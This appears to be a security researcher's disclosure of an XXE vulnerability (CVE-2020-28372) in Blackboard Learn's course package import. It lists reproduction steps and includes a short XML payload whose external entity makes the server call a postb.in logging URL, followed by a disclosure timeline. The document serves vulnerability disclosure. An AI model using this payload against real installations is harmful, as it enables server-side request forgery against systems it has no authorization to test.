# xxe_package_import

Affects Blackboard Learn 3800.19.0-rel.54+54663c8

Assigned CVE-2020-28372

An XXE (XML external entity) vulnerability in the Import Package functionality allows arbitrary URLs to be accessed by the server which could lead to server-side request forgery (SSRF).

## Prerequisites

  - Instructor role in Blackboard Learn

## Steps to reproduce

  1. Navigate to **Packages and Utilities > Export Course**
  2. Export any course element as a ZIP package
  3. Unzip the package
  4. Edit the file ```imsmanifest.xml```, so that the first three lines are (replace the link to a newly generated postb.in link or to an URL where you can view the webserver logs):
```
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [ <!ENTITY file SYSTEM "https://postb.in/1604848679504-5902031387668?xxe_test123"> ]>
<data>&file;</data>
...
```
  5. Zip the package into a new ZIP archive
  6. Navigate to **Import Package / View Logs**
  7. Import the ZIP archive
  8. The import will fail, but the link will be accessed, as evidenced by the postb.in or webserver access logs

[Video demo](https://gitlab.com/donnm/cves/-/raw/master/demos/xxe_package_import.mp4)

## Timeline

- 2020-10-27 Discovered
- 2020-11-08 Notified vendor (Blackboard Inc.)

